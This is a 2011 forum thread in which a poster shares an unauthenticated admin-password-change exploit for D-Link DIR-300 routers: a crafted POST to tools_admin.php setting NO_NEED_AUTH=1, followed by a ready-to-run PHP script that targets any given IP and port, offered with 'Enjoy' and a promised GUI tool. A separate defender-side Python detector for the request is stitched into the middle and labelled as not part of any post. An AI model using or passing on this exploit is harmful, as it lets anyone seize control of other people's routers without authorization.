Vcoderz Community

Google 02-09-2011 03:29 AM

Change D-Link DIR-300 (and others) routers password
 
The control panel script tools_admin.php allows an attacker to change
the administrator name, password and other variables without any
authorization by sending a specially crafted HTTP POST request such as:

---cut here---

POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh

---cut here---

Enjoy
;)

gachkar 02-09-2011 09:06 AM

Hey, thanks for the post!
But how to use it? Where to save it? To what extension?

Google 02-10-2011 01:51 AM

Quote:

Originally Posted by gachkar (Post 228136)
Hey, thanks for the post!
But how to use it? Where to save it? To what extension?

That was the HTTP POST request. You can send it using any language like PHP, Perl, Python... That's the PHP code:

Code:

<?php
// Expects three arguments: router IP address, port, new admin password.
if(sizeof($argv)!=4) {
  echo "Usage: php5 $argv[0] <router ip address> <port> <admin password>\n";
  exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
  echo "- Error: could not connect (http://$argv[1]:$argv[2]/tools_admin.php).\n";
  exit;
} else
  echo "+ request sent\n";
curl_close($ch);
// stripos() returns an integer offset or false, never true, so compare against false.
if(stripos($out,"login.php")!==false) {
  // The response points back to the login page: save it for inspection.
  echo "- something goes wrong (check answer - answer.html) !\n";
  $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
  exit;
}
else
  echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>

If you want, I will make a GUI executable file and post it here later.
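
A defender-side check for the request pattern discussed in this thread, as an added example that is not part of any post: it classifies captured HTTP requests and flags a POST to tools_admin.php in which the client itself supplies the authorization-state fields. The field names come from the posted request; the verdict names, the sample captures and the premise that the router's own UI never sends NO_NEED_AUTH or AUTH_GROUP are assumptions of this example.

```python
from urllib.parse import parse_qs, urlsplit

# Authorization-state fields from the request in the thread. Assumption: a
# legitimate save from the router's own admin page never includes them.
AUTH_STATE_FIELDS = {"NO_NEED_AUTH", "AUTH_GROUP"}
# Fields in that request that rewrite the administrator account.
CREDENTIAL_FIELDS = {"admin_name", "admin_password1"}

def parse_request(raw):
    """Return (method, path, form_fields) for a raw HTTP/1.x request, or None."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2:
        return None
    # The target may be absolute-form (http://host/path) or origin-form (/path).
    path = urlsplit(parts[1]).path
    # Parse the body regardless of Content-Length, which the sender controls.
    return parts[0].upper(), path, parse_qs(body.strip(), keep_blank_values=True)

def classify(raw):
    """Return 'alert', 'suspicious', 'review', 'ignore' or 'malformed'."""
    parsed = parse_request(raw)
    if parsed is None:
        return "malformed"
    method, path, fields = parsed
    if method != "POST" or not path.lower().endswith("/tools_admin.php"):
        return "ignore"
    spoofed = fields.keys() & AUTH_STATE_FIELDS
    if spoofed and fields.keys() & CREDENTIAL_FIELDS:
        return "alert"        # client-set auth state plus a credential change
    if spoofed:
        return "suspicious"   # client-set auth state on the admin script
    return "review"           # admin change: correlate with a logged-in session

# Constructed sample captures (not taken from a real device).
SAMPLES = {
    "bypass": "POST http://192.168.1.1:80/tools_admin.php HTTP/1.1\r\nHost: 192.168.1.1\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n"
              "ACTION_POST=LOGIN&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=EXAMPLE",
    "normal": "POST /tools_admin.php HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n"
              "ACTION_POST=1&admin_name=admin&admin_password1=EXAMPLE",
    "other": "GET /index.php HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, classify(raw))
```

A "review" verdict is not a clean bill: it only means the body carries no client-set authorization fields, so the request still has to be matched to an authenticated admin session.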

yaleil 02-13-2011 10:33 AM

Can you do that, please?

Google 02-17-2011 09:55 PM

Quote:

Originally Posted by yaleil (Post 228267)
Can you do that, please?

Here it is. But don't pwn yourself :p


All times are GMT +1.